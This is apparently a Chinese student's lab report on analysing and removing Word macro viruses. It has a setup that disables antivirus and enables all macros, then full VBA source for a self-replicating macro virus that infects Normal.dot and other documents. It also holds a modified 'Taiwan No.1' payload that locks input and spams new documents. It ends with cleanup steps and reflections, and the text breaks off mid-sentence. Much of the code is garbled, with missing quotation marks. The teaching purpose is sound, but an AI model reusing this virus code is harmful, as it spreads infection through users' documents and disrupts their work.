计算机宏病毒分析及清除实验.doc

.计算机宏病毒分析及清除实验一、实验目的1.了解“宏病毒”机理。2.掌握清除宏病毒的方法。3.掌握采用“宏”和脚本语言进行编程的技术。二、实验环境1.Windows XP操作系统。2.Office Word 2010字处理软件。三、实验要求1.宏的编写。2.理解宏病毒的作用机制。四、实验内容与步骤：1软件设置首先检查电脑里杀毒软件是否开启，如果开启需要关闭它。然后打开一个word文档（我直接打开的“计算机宏病毒分析及清除实验”），依次单击“文件”“选项”，然后在弹出的“word选项”对话框中单击“信任中心”，然后再单击“信任中心设置”“宏设置”。选择“启用所有宏”，“信任对VBA工程对象模型的访问”。2宏病毒实现自我复制功能打开一个word文档（我打开的“计算机宏病毒分析及清除实验”），然后按Alt+F11调用宏编写窗口,在左侧菜单栏中依次单击“project（计算机宏病毒分析及清除实验）”“Microsoft Word对象”“ThisDocument”，在这里输入实验代码单击“保存”，这时该文档就含有了宏病毒，然后单击“执行”，就立刻弹出一个窗口，第二次打开该文档，就自动执行以上代码，并将自身复制到Normal.dot和当前文档的ThisDocument中，此时所有的word文档关闭时，都将运行以上的病毒代码，产生影响。我又新建立了一个名字为“111”的word文档，打开后关闭就弹出一个提示框。代码如下：Macro-1：Micro-VirusSub Document_Open()On Error Resume NextApplication.DisplayStatusBar = FalseOptions.SaveNormalPrompt = FalseSet ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModuleSet host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate Then Set host = ActiveDocument.VBProject.VBComponents(1).CodeModuleEnd IfWith hostIf .Lines(1, 1) Micro-Virus Then .DeleteLines 1, .CountOfLines.InsertLines 1, ourcodemodule.Lines(1, 100).ReplaceLine 2, Sub Document_Close() If ThisDocument = NormalTemplate Then .ReplaceLine 2, Sub Document_Open() ActiveDocument.SaveAs ActiveDocument.FullName End If End IfEnd WithMsgBox B1104-何家红-16End Sub结果显示如下：上图为复制完代码保存后，单击执行的结果图上图为模板被感染病毒的结果图上图为新建文档“111”被感染病毒结果图3具有一定破坏性的宏本程序是以著名宏病毒“台湾一号”的恶意代码部分为基础，对源代码进行了适当的修改，这样降低了破坏性，否则实验室机器将受到严重影响。它的环境和操作方法与上面的相同。代码如下：Macro_2：moonlightDim nm(4)Sub Document_Open()DisableInput 1Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModuleSet host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate Then Set host = ActiveDocument.VBProject.VBComponents(1).CodeModuleEnd IfWith hostIf .Lines(1, 1) moonlight Then .DeleteLines 1, .CountOfLines.InsertLines 1, ourcodemodule.Lines(1, 100).ReplaceLine 3, Sub Document_Close() If ThisDocument = NormalTemplate Then .ReplaceLine 3, Sub Document_Open() ActiveDocument.SaveAs ActiveDocument.FullName End IfEnd IfEnd WithCount = 0If Year(Now() = 2013 Thentry: On Error GoTo try test = -1 con = 1 tog$ = i = 0 While test = -1 For i = 0 To 4 nm(i) = Int(Rnd() * 10) con = con * nm(i) If i = 4 Then tog$ = tog$ + Str$(nm(4) + =? GoTo beg End If tog$ = tog$ + Str$(nm(i) + * Next ibeg: Beep ans$ = InputBox$(今天是 + Date$ + ,跟你玩一个心算游戏 + Chr$(13) + 若你答错，只好接受震撼教育. + Chr$(13) + tog$, 台湾NO.1 Macro Virus) If RTrim$(LTrim$(ans$) = LTrim$(Str$(con) Then Documents.Add Selection.Paragraphs.Alignment = wdAlignParagraphCenter Beep With Selection.Font .Name = 细明体 .Size = 16 .Bold = 1 .Underline = 1 End With Selection.InsertAfter Text:=何谓宏病毒 Selection.InsertParagraphAfter Beep Selection.InsertAfter Text:=答案： Selection.Font.Italic = 1 Selection.InsertAfter Text:=我就是. Selection.InsertParagraphAfter Selection.InsertParagraphAfter Selection.Font.Italic = 0 Beep Selection.InsertAfter Text:=如何预防宏病毒 Selection.InsertParagraphAfter Beep Selection.InsertAfter Text:=答案： Selection.Font.Italic = 1 Selection.InsertAfter Text:=不要看我. GoTo out Else Count = Count + 1 For j = 1 To 20 Beep Documents.Add Next j Selection.Paragraphs.Alignment = wdAlignParagraphCenter Selection.InsertAfter Text:=宏病毒 If Count = 2 Then GoTo out GoTo try End IfWendEnd Ifout:End Sub结果显示如下：上图为打开被感染病毒的word文档弹出的窗口上面两个图是计算错误后出现的结果。新建了20个word文档，并且继续进行计算。上图为计算正确的结果图，即新建一个文档，并跳出字幕。4清除宏病毒（1）打开受感染的word文档，按“Alt+F11” 进入宏编辑环境，将每个“Project”下的“This Document”中的病毒代码删除然后保存。（2）打开模板“Normal Microsoft Word”对象将“This Document”中的病毒代码删除然后保存。注意：清除病毒时候，先清除每个“Project”内的代码，在最后一个被感染的文档中删除模板内的代码，否则重新打开其他被感染病毒的文档，模板再次被感染。五、实验心得通过本次实验我实际感受到了宏病毒传播的可怕性，他会无限的循环，执行恶意代码，也了解了它执行的基本流程。另外在试验中我遇见了几个问题实验我认为应该注意以下几个问题：1实验时候首先要注意实验环境与给的参考资料环境是否一样，本次实验就不一样，所以有些步骤会稍有不同，不能盲目的照着参考资料做实验，要具体研究实验的原理，然后进行实验验证。2.根据这个实验应该是被感染宏病毒后的文档在打开和关闭时候都有图框出现，因为宏病毒在传播复制代码时候应该自动更改函数名，colse变为open，但是我的实验只有在关闭文档时出现图框，在打开文档时并不出现，在